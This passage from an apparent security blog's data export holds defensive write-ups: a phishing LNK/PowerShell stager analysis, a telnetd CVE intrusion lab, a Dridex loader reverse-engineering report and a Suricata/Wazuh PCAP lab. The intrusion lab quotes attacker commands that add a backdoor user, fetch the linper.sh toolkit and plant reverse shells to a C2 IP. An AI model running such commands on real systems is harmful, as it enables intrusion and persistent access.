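    return {"deobfuscated": clean, "urls": urls, "basic_auth": creds,
            "aliases": aliases, "fingerprint": fingerprint}


if __name__ == "__main__":
    report = extract_iocs(STAGER)
    print(report["deobfuscated"])
    for key in ("urls", "basic_auth", "aliases", "fingerprint"):
        print(key, report[key])
```

Each transformation mirrors what the PowerShell parser itself does to the text, so the result is exactly the script that would have run; the credentials and both URLs fall out of the decoded string without ever executing it.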
PDF # The PDF was confirmed legitimate with no malicious content: no JavaScript, no embedded files, no launch actions, no OpenAction triggers:\nPDFiD 0.2.8 Health_Clearance_Guidelines.pdf\n PDF Header: %PDF-1.4\n obj 314\n endobj 314\n stream 14\n endstream 14\n /Page 3\n /Encrypt 0\n /JS 0\n /JavaScript 0\n /OpenAction 0\n /Launch 0\n /EmbeddedFile 0\nIts sole purpose was to serve as a convincing decoy while the LNK payload executed in the background.\nIOCs # Files\n- Health_Clearance-December_Archive.zip — password: Up7Pk99G\n- EU_Health_Compliance_Portal.lnk — malicious shortcut\n- Health_Clearance_Guidelines.pdf — benign decoy\nNetwork\n- C2 check-in: https://health-status-rs.com/api/v1/checkin\n- Implant delivery: https://advent-of-the-relics-forum.htb.blue/api/v1/implant/cid=\n- Sender domain: ca1e-corp.org (typosquat of cale-corp.org)\nCredentials\n- svc_temp:SnowBlackOut_2026! — hardcoded Basic auth\nMITRE ATT\u0026amp;CK #\n- Phishing: Spearphishing Attachment (T1566.001): ZIP with LNK delivered via email\n- User Execution: Malicious File (T1204.002): victim opens LNK\n- Command and Scripting: PowerShell (T1059.001): obfuscated PS stager\n- Masquerading (T1036): LNK disguised as portal document\n- System Information Discovery (T1082): USERNAME, USERDOMAIN, MachineGuid\n- Application Layer Protocol: HTTPS (T1071.001): C2 over HTTPS\n- Ingress Tool Transfer (T1105): implant fetched from C2\n","date":"March 7, 2026","externalUrl":null,"permalink":"/investigations/htb-a-call-from-the-museum/","section":"","summary":"A phishing email with a password-protected ZIP delivered an LNK file that executed an obfuscated PowerShell stager — collecting system fingerprint data, checking in to a C2, and fetching a next-stage implant using hardcoded credentials. 
A decoy PDF was opened simultaneously to distract the victim.","title":"HTB-A Call from the Museum","type":"investigations"},{"content":"","date":"March 7, 2026","externalUrl":null,"permalink":"/tags/pdf/","section":"Tags","summary":"","title":"PDF","type":"tags"},{"content":"","date":"March 6, 2026","externalUrl":null,"permalink":"/tags/cve-2026-24061/","section":"Tags","summary":"","title":"CVE-2026-24061","type":"tags"},{"content":" Difficulty: Very Easy OS: Windows Date: 2026-03-06 TL;DR # An attacker at 192.168.72.136 exploited CVE-2026-24061 in GNU inetutils telnetd to gain an unauthenticated root shell via Telnet option negotiation abuse. A backdoor user cleanupsvc was created, and the linper.sh persistence toolkit was deployed across cron and systemd. The attacker then stood up an HTTP server and exfiltrated credit-cards-25-blackfriday.db before deleting it from the victim.\nPackets overview # CVE-2026-24061 # CVE-2026-24061 is a critical authentication bypass vulnerability in GNU inetutils telnetd. During Telnet option negotiation, a remote client can inject environment variables using the NEW-ENVIRON mechanism (RFC 1572). On vulnerable versions, the value of USER is forwarded unsanitized to the system login program — setting USER=-f root causes login to treat the session as pre-authenticated, yielding an unauthenticated root shell. 
The injected value is interpreted as a command-line flag rather than a username because telnetd passes USER directly as an argument to /bin/login.\nAt 2026-01-27 10:39 the attacker (192.168.72.136) exploited CVE-2026-24061 and obtained root access without credentials.\nPersistence # After gaining root, the attacker created a backdoor user with a hardcoded password:\nsudo useradd -m -s /bin/bash cleanupsvc\necho \u0026#34;cleanupsvc:YouKnowWhoiam69\u0026#34; | sudo chpasswd\nThe persistence toolkit linper.sh was then downloaded from GitHub:\nwget https://raw.githubusercontent.com/montysecurity/linper/refs/heads/main/linper.sh\nlinper.sh installed reverse shell callbacks using awk, bash, nc, perl, pwsh, python3, and telnet across multiple persistence locations, all pointing at 91.99.25.54:\nbash linper.sh --enum-defenses 91.99.25.54\nPersistence Installed: awk using /var/spool/cron/crontabs/root\nPersistence Installed: awk using /etc/crontab\nPersistence Installed: awk using /etc/cron.d/\nPersistence Installed: awk using /etc/systemd/\n-----------------------\nPersistence Installed: bash using /var/spool/cron/crontabs/root\nPersistence Installed: bash using /etc/crontab\nPersistence Installed: bash using /etc/cron.d/\nPersistence Installed: bash using /etc/systemd/\nPersistence Installed: bash using /etc/rc.local\n...[snip]... 
Persistence locations written:\n1/var/spool/cron/crontabs/root 2/etc/crontab 3/etc/cron.d/ 4/etc/systemd/ 5/etc/rc.local Exfiltration # The attacker deployed an HTTP server on port 6932 and at 2026-01-27 10:49:54 exfiltrated credit-cards-25-blackfriday.db, then deleted the file from the victim server to cover their tracks.\nIOCs # Network\n- Attacker: 192.168.72.136\n- C2: 91.99.25.54\n- Exfil server port: 6932\nFiles\n- credit-cards-25-blackfriday.db — exfiltrated and deleted\n- linper.sh — persistence toolkit from github.com/montysecurity/linper\nCredentials\n- cleanupsvc:YouKnowWhoiam69 — backdoor user\nMITRE ATT\u0026amp;CK # Technique ID Description Exploit Public-Facing Application T1190 CVE-2026-24061 telnetd auth bypass Create Account: Local Account T1136.001 backdoor user cleanupsvc Scheduled Task/Job: Cron T1053.003 linper.sh crontab persistence Boot or Logon Initialization Scripts T1037 /etc/rc.local persistence Systemd Service T1543.002 /etc/systemd/ persistence Exfiltration Over Alternative Protocol T1048 HTTP server on port 6932 Data Destruction T1485 deleted db file post-exfiltration ","date":"March 6, 2026","externalUrl":null,"permalink":"/investigations/htb-telly/","section":"","summary":"An attacker exploited CVE-2026-24061, an authentication bypass in GNU inetutils telnetd, to obtain an unauthenticated root shell, established persistence via linper.sh across multiple cron and systemd locations, and exfiltrated a credit card database before deleting it from the victim server.","title":"HTB-Telly","type":"investigations"},{"content":"","date":"March 6, 2026","externalUrl":null,"permalink":"/tags/telnet/","section":"Tags","summary":"","title":"Telnet","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/anti-debugging/","section":"Tags","summary":"","title":"Anti-Debugging","type":"tags"},{"content":"","date":"March 3, 
2026","externalUrl":null,"permalink":"/tags/capa/","section":"Tags","summary":"","title":"Capa","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/capev2/","section":"Tags","summary":"","title":"CAPEv2","type":"tags"},{"content":" Difficulty: Insane OS: Windows Date: 2026-02-28 TL;DR # A Dridex loader DLL with minimal static imports (OutputDebugStringA, Sleep). It dynamically resolves all needed APIs at runtime using CRC32 hashing XOR-ed with 0x38BA5C7B, and calls them indirectly via int3/retn with a registered vectored exception handler — neutralizing debugger breakpoints in the process. Embedded strings are encrypted with RC4 using a 40-byte reversed key. After passing anti-VM and execution delay checks, it connects to four hardcoded C2 servers to download additional modules via InternetConnectW and InternetReadFile.\nInitial Analysis # Field Value Type DridexLoader Payload: 32-bit DLL File Name malware.dll File Type PE32 executable (DLL) (GUI) Intel 80386, for MS Windows File Size 249856 bytes MD5 df1b0f2d8e1c9ff27a9b0eb50d0967ef SHA256 f9495e968f9a1610c0cf9383053e5b5696ecc85ca3ca2a338c24c7204cc93881 The binary was identified by CAPA as DridexLoader Payload and matched the YARA rule HeavensGate — indicating use of the Heaven\u0026rsquo;s Gate technique to switch from 32-bit to 64-bit mode at runtime.\nImports # Only two static imports were found:\n1OutputDebugStringA 2Sleep Exports # 1.text:0x00009D70 .rdata:0x0003AB08 DllRegisterServer Sections # The .rdata section showed unusually high entropy of 7.761, suggesting compressed or encrypted data. 
The .text section had entropy of 6.529.\nCAPEv2 Sandbox # The anti-VM functionality limited sandbox visibility, but CAPEv2 successfully extracted the malware configuration — revealing four C2 servers and the RC4 encryption key used for communication:\n1C2: 192.46.210.220:443 2 143.244.140.214:808 3 45.77.0.96:6891 4 185.56.219.47:8116 5RC4: 9fRysqcdPgZffBlroqJaZHyCvLvD6BUV Static Analysis # Resolving API # Function mw_API_resolve is called twice from the entry point function, both times with the same value for the first parameter. For the second call, the return value is called as a function, so we know that it must be dynamically resolving an API through the hashes from its parameters. Since both calls share the same value for the first parameter but different values for the second one, we can assume that the first hash corresponds to a library name, and the second one corresponds to the name of the target API in that library.\n1BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved) 2{ 3 v7[0] = v3; 4 v4 = hinstDLL; 5 sub_607980(v7, 0); 6 dword_62B1D4 = mw_API_resolve(-1590620315, 497732535); 7 if ( !byte_62B028 ) 8 { 9 if ( hinstDLL != NtCurrentTeb()-\u0026gt;ProcessEnvironmentBlock ) 10 byte_62B265 = 1; 11 if ( !byte_62B265 ) 12 { 13 mw_anti_vm(v7[0]); 14 dword_62B1D4(0); 15 } 16//...[snip]... 17 || (byte_62B004 = 0, (v6 = mw_API_resolve(-1590620315, -1462740277)) != 0) 18 \u0026amp;\u0026amp; v6(0, 0, sub_5F5100, hinstDLL, 0, 0) ) Investigation of cross-references (xrefs) to sub_6015C0 reveals that this function is called multiple times throughout the malware\u0026rsquo;s code, each time with different hash values as parameters, which confirms our assumption about the dynamic API resolution technique. The subroutine starts by passing the DLL hash to the functions sub_606C50 and sub_607564. The return value and the API hash are then passed into sub_6067C8 as parameters. 
From this, we can assume the first two functions retrieve the base of the DLL corresponding to the DLL hash, and this base address is passed to the last function with the API hash to resolve the API.\n1int __stdcall mw_API_resolve(int maybe_DLL_hash, int maybe_API_hash) 2{ 3//...[snip]... 4v6 = sub_607564(maybe_DLL_hash, maybe_DLL_hash); 5 if ( !v6 ) 6 { 7 if ( sub_606C50(maybe_DLL_hash) ) 8 v6 = sub_607564(maybe_DLL_hash, maybe_DLL_hash); 9 } 10 if ( !v6 ) 11 return 0; 12 else 13 return sub_6067C8(v6, maybe_API_hash, v7, v8); 14} Hashing algorithm # sub_607564 is the hashing algorithm. The target API hash is XOR-ed with 0x38BA5C7B before being compared to the hash of each API name.\n1void *__userpurge sub_607564@\u0026lt;eax\u0026gt;(int maybe_DLL_hash@\u0026lt;eax\u0026gt;, int maybe_API_hash) 2{ 3//...[snip]... 4 if ( dll_hash == (sub_61D620(v43, v16) ^ 0x38BA5C7B) ) 5//...[snip]... The constant values loaded or used in the program can help pick out the algorithm.\nAmong the three constants being used in this function, one stands out with the repetition of the value 0x0EDB8832, which is typically used in the CRC32 hashing algorithm. So, sub_61D620 is a function to generate a CRC32 hash from a given string, and the API hashing algorithm of DRIDEX boils down to XOR-ing the CRC32 hash of API/DLL names with 0x38BA5C7B. 1.rdata:0062A2F0 xmmword_62A2F0 xmmword 3000000020000000100000000h 2.rdata:0062A2F0 ; DATA XREF: sub_61D620+11↑r 3.rdata:0062A300 xmmword_62A300 xmmword 1000000010000000100000001h 4.rdata:0062A300 ; DATA XREF: sub_61D620+2D↑r 5.rdata:0062A300 ; sub_61D620+9A↑r ... 6.rdata:0062A310 xmmword_62A310 xmmword 0EDB88320EDB88320EDB88320EDB88320h I used hashdb to look up the hashes in the sample. The hash 0x1DAACBB7 corresponds correctly to the ExitProcess API, which confirms that our assumption about the hashing algorithm is correct. 
C2 Communication # To identify all resolved APIs without manually tracing each hash, I wrote an IDAPython script that extracted all push arguments preceding calls to mw_API_and_DLL_resolve and saved them to a file. Each hash was then resolved against the hashdb API using the XOR key 0x38BA5C7B identified earlier:\n1import requests 2 3filename = r\u0026#34;C:\\Users\\f\\Desktop\\calls.txt\u0026#34; 4xor_key = 0x38BA5C7B 5 6unique_args = {} 7 8with open(filename, \u0026#34;r\u0026#34;) as file: 9 for line in file: 10 parts = line.split() 11 if len(parts) \u0026gt;= 3: 12 addr, dll_h, api_h = parts[0], int(parts[1]), int(parts[2]) 13 for h in [dll_h, api_h]: 14 if h not in unique_args: 15 unique_args[h] = set() 16 unique_args[h].add(addr) 17 18for hash_value in sorted(unique_args): 19 response = requests.get( 20 f\u0026#34;https://hashdb.openanalysis.net/hash/crc32/{str(hash_value ^ xor_key)}\u0026#34; 21 ) 22 if response.status_code == 200: 23 data = response.json() 24 if data.get(\u0026#34;hashes\u0026#34;): 25 name = data[\u0026#34;hashes\u0026#34;][0][\u0026#34;string\u0026#34;][\u0026#34;string\u0026#34;] 26 addrs = \u0026#34;, \u0026#34;.join(sorted(unique_args[hash_value])) 27 print(f\u0026#34;Found: {name} @ {addrs}\u0026#34;) The full WinINet call chain was recovered, confirming a complete HTTP-based C2 communication stack:\n1Found: InternetOpenA @ 0x00623238 2Found: InternetConnectW @ 0x0062346C 3Found: HttpOpenRequestW @ 0x00623508 4Found: HttpSendRequestW @ 0x0062388E 5Found: InternetReadFile @ 0x00623AD6 6Found: HttpQueryInfoW @ 0x0062392F, 0x00623985, 0x006239DE 7Found: InternetSetOptionW @ 0x006235FF, 0x00623622, 0x0062367B 8Found: InternetQueryOptionW @ 0x0062364D 9Found: InternetCloseHandle @ 0x0062327D, 0x0062330D, ... 
The function responsible for C2 connection is at 0x00623370 (InternetConnectW), and the module download function is at 0x00623820 (InternetReadFile).\nResolved API Analysis # The full resolved API list revealed several additional capability clusters beyond the C2 stack.\nProcess injection — a complete injection toolkit using Nt* functions directly from NTDLL to bypass higher-level API monitoring: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtReadVirtualMemory, NtProtectVirtualMemory, NtMapViewOfSection, NtUnmapViewOfSection, NtCreateSection, RtlCreateUserThread, NtQueueApcThread, NtResumeThread.\nRegistry persistence — RegCreateKeyExW, RegSetValueExA, RegLoadKeyW, RegUnLoadKeyW, RegOpenKeyExW, RegQueryValueExW/A indicate reading and writing of registry keys including hive load/unload operations — NTUSER.DAT was also present in the decrypted strings.\nCryptography — CryptAcquireContextW, CryptGenRandom, CryptCreateHash, CryptHashData, CryptGetHashParam, CryptDestroyHash indicate use of the Windows CryptoAPI for key generation or data hashing separate from the RC4 string encryption.\nProcess and memory enumeration — K32GetProcessImageFileNameW, K32EnumProcessModulesEx, K32GetModuleBaseNameW, NtQuerySystemInformation, NtQueryVirtualMemory, CreateToolhelp32Snapshot, Thread32First, Thread32Next point to thorough process and module scanning consistent with injection target selection.\nInter-process atom communication — GlobalAddAtomW, GlobalGetAtomNameA/W, GlobalDeleteAtom are used for stealthy inter-process signaling without named pipes or sockets.\nCOM usage — CoCreateInstance, CoInitializeEx, CoUninitialize suggest use of COM objects, possibly for IWebBrowser2-based form grabbing consistent with Dridex\u0026rsquo;s known banking capabilities.\nException Handler # The sample does not use the call instruction to call APIs. Instead, the malware uses a combination of int3 and retn instructions to call its Windows APIs after dynamically resolving them. 
The function sub_607980 dynamically resolves RtlAddVectoredExceptionHandler and calls it to register sub_607D40 as a vectored exception handler. This means that when the program encounters an int3 instruction, sub_607D40 is invoked by the kernel to handle the interrupt and transfer control to the API stored in eax.\n1LABEL_9: 2 v8 = mw_DLL_base(0x588AB3EA, 0x588AB3EA); 3 if ( !v8 \u0026amp;\u0026amp; sub_606C50(NTDLL_DLL) ) 4 v8 = mw_DLL_base(0x588AB3EA, 0x588AB3EA); // NTDLL.DLL 5 if ( v8 ) 6 v9 = mw_API_resolve(v8, 0x82115E73, v10, v11);// RtlAddVectoredExceptionHandler 7 else 8 v9 = nullptr; 9LABEL_12: 10 n787139894 = sub_607A60(v9); 11 byte_62B26C = 0; 12 } sub_607D40 handles three exception codes:\nNTSTATUS Code Symbolic Name Description 0xC0000005 STATUS_ACCESS_VIOLATION Invalid memory access 0xC00000FD STATUS_STACK_OVERFLOW Stack exhaustion 0xC0000374 STATUS_HEAP_CORRUPTION Heap metadata corruption 1int __stdcall sub_607D40(int **a1) 2{ 3 v1 = **a1; 4 if ( v1 == 0xC0000005 || v1 == 0xC00000FD || v1 == 0xC0000374 ) 5 { 6 //...[snip]... 7 kernel32_base = mw_DLL_base(0xA1310F65, 0xA1310F65); 8 if ( !kernel32_base ) 9 { 10 if ( sub_606C50(0xA1310F65) ) 11 kernel32_base = mw_DLL_base(0xA1310F65, 0xA1310F65);// KERNEL32.DLL 12 } 13 if ( kernel32_base ) 14 { 15 TreminateProcess = mw_API_resolve(kernel32_base, 0x93FAE3F6, v7, v8);// TreminateProcess 16//...[snip]... 17 __debugbreak(); 18 return TreminateProcess; For these exceptions, the handler dynamically resolves an API using module hash 0xA1310F65(KERNEL32.DLL) and function hash 0x93FAE3F6(TerminateProcess)\nFor STATUS_BREAKPOINT (0x80000003), the handler manually patches the exception context record, advancing EIP past the breakpoint and adjusting the stack before returning EXCEPTION_CONTINUE_EXECUTION (-1):\n1//...[snip]... 
2 else if ( v1 == 0x80000003 ) 3 { 4 ++a1[1][46]; 5 a1[1][49] -= 4; 6 *a1[1][49] = a1[1][46] + 1; 7 a1[1][49] -= 4; 8 *a1[1][49] = a1[1][44]; 9 return -1; 10 } This is a known anti-debugging technique: by silently swallowing STATUS_BREAKPOINT, DRIDEX neutralizes software breakpoints set by a debugger, allowing execution to continue transparently from the next instruction.\nAnti-VM # The callback function sub_5F5100 called mw_anti_vm(), resolved two APIs via hash, then performed an unconditional jmp to a resolved address — consistent with a stager or loader pattern that transfers execution to unpacked code:\n1void __cdecl sub_5F5100(int a1) 2{ 3 int v1; // [esp+0h] [ebp-8h] 4 5 mw_anti_vm(); 6 v1 = mw_API_resolve(-1590620315, -169236058); 7 mw_API_resolve(-1590620315, -1206567270); 8 __asm { jmp [ebp+var_8] } 9} mw_anti_vm() implemented an execution delay loop that ran up to 199,999,100 iterations, calling OutputDebugStringA and Sleep(0xA) repeatedly — a common sandbox evasion technique designed to exhaust sandbox time limits:\n1while ( 1 ) 2{ 3 sub_615CB0(20, 80); 4 OutputDebugStringA(lpOutputString[0]); 5 Sleep(0xAu); 6 sub_610B10(lpOutputString); 7 if ( ++v1 \u0026gt;= 199999100 ) 8 break; 9 while ( v1 \u0026gt;= 4987 ) 10 { 11 if ( ++v1 \u0026gt;= 199999100 ) 12 { 13 OutputDebugStringA(v75); 14 goto LABEL_9; 15 } 16 } Strings Encryption # capa identified RC4 encryption capabilities in the binary:\n1encrypt data using RC4 KSA 2namespace data-manipulation/encryption/rc4 3scope function 4matches 0x61E5D0 5 6encrypt data using RC4 PRGA 7namespace data-manipulation/encryption/rc4 8scope function 9matches 0x61E5D0 I renamed 0x61E5D0 to mw_RC4. The signed int a2 parameter may indicate the key length:\n1void __fastcall mw_RC4(int a1, signed int a2, int a3, int a4, int a5, int (__stdcall *a6)(int, int), int a7) Tracing the callers of mw_RC4 confirmed the key length is 40 bytes — passed as the second parameter. 
Before the key is applied, sub_61E780 performs a byte-reversal on the key bytes:\nFollowing the call chain to identify the encrypted data source, I found that sub_607B30 is called with \u0026amp;unk_629BC0 as the data parameter:\n1_WORD **__fastcall sub_5FAC00(_WORD **a1, int a2) 2{ 3 sub_607B30(a1, \u0026amp;unk_629BC0, a2); 4 return a1; 5} The RC4 key (before reversal) is:\n1D5BBC53E129470925A59E6EA6AA9E6C48BC48D5093D51CD433884126BAE4A81560E7B19148933CDB After accounting for the byte-reversal and decrypting, the plaintext strings from 0x629BC0 were recovered:\n1Program Manager 2Progman 3AdvApi32~PsApi~shlwapi~shell32~WinInet 4/run /tn \u0026#34;%ws\u0026#34; 5\u0026#34;%ws\u0026#34; /grant:r \u0026#34;%ws\u0026#34;:F 6\\NTUSER.DAT 7winsxs 8x86_* 9amd64_* 10*.exe 11\\Sessions\\%d\\BaseNamedObjects\\ These strings reveal the malware\u0026rsquo;s targets and internal logic: AdvApi32~PsApi~shlwapi~shell32~WinInet is a tilde-delimited list of DLLs the malware dynamically resolves, Program Manager / Progman indicate process or window targeting, and the schtasks /run /tn \u0026quot;%ws\u0026quot; template suggests scheduled task abuse for execution or persistence.\nIOCs # Files\n- malware.dll\n- MD5: df1b0f2d8e1c9ff27a9b0eb50d0967ef\n- SHA256: f9495e968f9a1610c0cf9383053e5b5696ecc85ca3ca2a338c24c7204cc93881\nNetwork\n- C2: 192.46.210.220:443\n- C2: 143.244.140.214:808\n- C2: 45.77.0.96:6891\n- C2: 185.56.219.47:8116\nEncryption\n- Algorithm: RC4\n- Key (pre-reversal): D5BBC53E129470925A59E6EA6AA9E6C48BC48D5093D51CD433884126BAE4A81560E7B19148933CDB\n- CAPEv2 key: 9fRysqcdPgZffBlroqJaZHyCvLvD6BUV\nAttack Flow # %%{init: {'theme': 'base', 'themeVariables': { 'background': '#ffffff', 'mainBkg': '#ffffff', 'primaryTextColor': '#000000', 'lineColor': '#333333', 'clusterBkg': '#ffffff', 'clusterBorder': '#333333'}}}%% graph TD classDef default fill:#f9f9f9,stroke:#333,stroke-width:1px,color:#000; classDef input fill:#e1f5fe,stroke:#0277bd,stroke-width:2px,color:#000; classDef 
check fill:#fff9c4,stroke:#fbc02d,stroke-width:2px,stroke-dasharray: 5 5,color:#000; classDef exec fill:#ffebee,stroke:#c62828,stroke-width:2px,color:#000; classDef term fill:#e0e0e0,stroke:#333,stroke-width:2px,color:#000; Load([malware.dll LoadedDllEntryPoint]):::input --\u003e APIResolve[Dynamic API ResolutionCRC32 XOR 0x38BA5C7B]:::exec subgraph Evasion [Evasion] APIResolve --\u003e VEH[Register VEHRtlAddVectoredExceptionHandler]:::exec VEH --\u003e Int3[int3 + retnIndirect API Calls]:::exec Int3 --\u003e AntiVM{Anti-VMExecution Delay Loop199,999,100 iterations}:::check AntiVM -.-\u003e|Timeout / VM| Exit[Exit]:::term AntiVM -- Pass --\u003e HeavensGate[Heaven's Gate32-bit → 64-bit switch]:::exec end subgraph Init [Initialization] HeavensGate --\u003e RC4[RC4 String Decryption40-byte reversed key]:::exec RC4 --\u003e Strings[\"Program Manager, ProgmanAdvApi32~PsApi~shlwapi~shell32~WinInetNTUSER.DAT, schtasks /run /tn\"]:::exec Strings --\u003e Loader[sub_5F5100Resolve APIs + jmp to unpacked code]:::exec end subgraph Persistence [Persistence] Loader --\u003e Reg[Registry R/WRegCreateKeyExW / RegSetValueExA]:::exec Loader --\u003e Hive[Offline Hive ManipulationRegLoadKeyW / NTUSER.DAT]:::exec Loader --\u003e Task[Scheduled Taskschtasks /run /tn]:::exec end subgraph Injection [Process Injection] Loader --\u003e Enum[Process EnumerationToolhelp32 / NtQuerySystemInformation]:::exec Enum --\u003e Target[Select Injection Target]:::exec Target --\u003e Alloc[NtAllocateVirtualMemoryNtWriteVirtualMemory]:::exec Alloc --\u003e Protect[NtProtectVirtualMemoryNtMapViewOfSection]:::exec Protect --\u003e Thread[RtlCreateUserThreadNtQueueApcThread / NtResumeThread]:::exec end subgraph C2 [C2 Communication] Thread --\u003e IOpen[InternetOpenA]:::exec IOpen --\u003e IConnect[InternetConnectW0x00623370]:::exec IConnect --\u003e IRequest[HttpOpenRequestWHttpSendRequestW]:::exec IRequest --\u003e IRead[InternetReadFile0x00623820Download modules]:::exec IRead --\u003e 
IP1((192.46.210.220:443)):::exec IRead --\u003e IP2((143.244.140.214:808)):::exec IRead --\u003e IP3((45.77.0.96:6891)):::exec IRead --\u003e IP4((185.56.219.47:8116)):::exec end subgraph Banking [Banking Capabilities] Thread --\u003e COM[CoCreateInstanceIWebBrowser2 Form Grabbing]:::exec Thread --\u003e Atoms[GlobalAddAtomWInter-process Signaling]:::exec Thread --\u003e Crypt[CryptoAPICryptGenRandom / CryptHashData]:::exec end ","date":"March 3, 2026","externalUrl":null,"permalink":"/investigations/cdef-tealer/","section":"","summary":"A Dridex loader DLL that dynamically resolves APIs via CRC32 hashing, uses int3/retn as an indirect call mechanism to evade analysis, decrypts embedded strings with RC4, and connects to four hardcoded C2 servers over HTTPS to download additional modules.","title":"CDEF-$tealer","type":"investigations"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/crc32/","section":"Tags","summary":"","title":"CRC32","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dll/","section":"Tags","summary":"","title":"DLL","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dridex/","section":"Tags","summary":"","title":"Dridex","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/dynamic-api-resolution/","section":"Tags","summary":"","title":"Dynamic API Resolution","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/hashdb/","section":"Tags","summary":"","title":"HashDB","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/heavens-gate/","section":"Tags","summary":"","title":"Heaven's Gate","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/indirect-calls/","section":"Tags","summary":"","title":"Indirect Calls","type":"tags"},{"content":"","date":"March 3, 
2026","externalUrl":null,"permalink":"/tags/loader/","section":"Tags","summary":"","title":"Loader","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/pe/","section":"Tags","summary":"","title":"PE","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/rc4/","section":"Tags","summary":"","title":"RC4","type":"tags"},{"content":"","date":"March 3, 2026","externalUrl":null,"permalink":"/tags/vectored-exception-handling/","section":"Tags","summary":"","title":"Vectored Exception Handling","type":"tags"},{"content":" Objective # Replay a PCAP file through Suricata integrated with Wazuh to practice network-based threat detection, analyze generated alerts, reconstruct the infection chain, and map findings to MITRE ATT\u0026amp;CK.\nPCAP Overview # The PCAP file contains network traffic captured from an infected Windows 7 (64-bit) host on an internal network.\nTimeline:\n- Start: Feb 8, 2021 @ 17:59:18\n- End: Feb 8, 2021 @ 18:18:18\n- Duration: ~19 minutes\nHosts involved:\nHost Type Role 10.2.8.101 Internal Infected Windows 7 victim 10.2.8.2 Internal Gateway / DNS — target of lateral movement 8.208.10.147 External roanokemortgages.com — payload delivery 213.5.229.12 External satursed.com — Hancitor C2 198.211.10.238 External Cobalt Strike / Meterpreter / Dridex C2 185.100.65.29 External Ficker Stealer C2 162.241.149.195 External Phishing / Let\u0026rsquo;s Encrypt IDN 54.235.147.252 External api.ipify.org — IP lookup Victim OS: Windows 7 64-bit, identified via User-Agent strings:\n- Windows NT 6.1; Win64; x64; Trident/7.0 (Internet Explorer 11)\n- Windows NT 6.1; WOW64; Trident/5.0 (Internet Explorer 9)\nWhat Suricata Detected # Suricata generated 423 alerts forwarded to Wazuh via eve.json. 
All alerts appeared under Wazuh rule.id: 86601 in the Security Events dashboard.\nSuricata Signature IDs triggered:\nSignature ID Rule Name Category 2034127 ET MALWARE Tordal/Hancitor/Chanitor Checkin Malware C2 2033713 ET MALWARE Cobalt Strike Beacon Observed Malware C2 2028765 ET JA3 Hash - [Abuse.ch] Possible Dridex Malware C2 2035651 ET MALWARE Meterpreter or Other Reverse Shell SSL Cert Malware C2 2031074 ET MALWARE Win32/Ficker Stealer Activity Malware 2014819 ET INFO Packed Executable Download Execution 2018358 ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad Hunting 2024227 ET PHISHING Lets Encrypt Free SSL Cert with IDN/Punycode Phishing 2047702 ET INFO External IP Lookup Domain (ipify.org) in DNS Reconnaissance 2029622 ET INFO External IP Lookup (ipify.org) Reconnaissance 2067085 ET INFO NTLM Session Setup Request - Negotiate Lateral Movement Infection Chain Reconstruction # By correlating alert timestamps, a complete infection chain is visible:\nPayload Delivery\n1ET INFO Packed Executable Download 2→ src: 10.2.8.101 → dest: 8.208.10.147 (roanokemortgages.com) 3→ File: /6lhjgfdghj.exe (42,405 bytes — application/octet-stream) 4→ Hancitor dropper delivered over HTTP 5→ MITRE T1105: Ingress Tool Transfer 1\u0026#34;http\u0026#34;: { 2 \u0026#34;hostname\u0026#34;: \u0026#34;roanokemortgages.com\u0026#34;, 3 \u0026#34;protocol\u0026#34;: \u0026#34;HTTP/1.1\u0026#34;, 4 \u0026#34;http_method\u0026#34;: \u0026#34;GET\u0026#34;, 5 \u0026#34;http_content_type\u0026#34;: \u0026#34;application/octet-stream\u0026#34;, 6 \u0026#34;length\u0026#34;: \u0026#34;42405\u0026#34;, 7 \u0026#34;url\u0026#34;: \u0026#34;/6lhjgfdghj.exe\u0026#34;, 8 \u0026#34;http_user_agent\u0026#34;: \u0026#34;Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\u0026#34;, 9 \u0026#34;status\u0026#34;: \u0026#34;200\u0026#34; 10 }, 11 \u0026#34;files\u0026#34;: [ 12 { 13 \u0026#34;filename\u0026#34;: \u0026#34;/6lhjgfdghj.exe\u0026#34;, 14 \u0026#34;size\u0026#34;: 
42405, 15 \u0026#34;stored\u0026#34;: false, 16 \u0026#34;state\u0026#34;: \u0026#34;UNKNOWN\u0026#34;, 17 \u0026#34;tx_id\u0026#34;: 2, 18 \u0026#34;gaps\u0026#34;: false 19 } Reconnaissance\n1ET INFO External IP Lookup Domain (ipify.org) in DNS Lookup 2ET INFO External IP Lookup (ipify.org) 3→ src: 10.2.8.101 → dest: 54.235.147.252 (api.ipify.org) 4→ Malware checks victim\u0026#39;s external IP — standard post-infection behavior 5→ MITRE T1590: Gather Victim Network Information Hancitor C2 Check-in\n1ET MALWARE Tordal/Hancitor/Chanitor Checkin 2ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad 3→ src: 10.2.8.101 → dest: 213.5.229.12 (satursed.com) 4→ Hancitor dropper reports to C2, receives next-stage payload instructions 5→ MITRE T1071.001: Application Layer Protocol: Web Protocols Secondary Payload C2\n1ET MALWARE Cobalt Strike Beacon Observed 2ET MALWARE Meterpreter or Other Reverse Shell SSL Cert 3ET HUNTING Suspicious Empty SSL Certificate — Cobalt Strike 4ET JA3 Hash - [Abuse.ch] Possible Dridex 5→ src: 10.2.8.101 → dest: 198.211.10.238 6→ Cobalt Strike beacon and Dridex banking trojan establish C2 over TLS 7→ MITRE T1071.001, T1573.001: Encrypted Channel Infostealer Activity\n1ET MALWARE Win32/Ficker Stealer Activity 2→ src: 10.2.8.101 → dest: 185.100.65.29 3→ Ficker Stealer active — targets browsers, credentials, 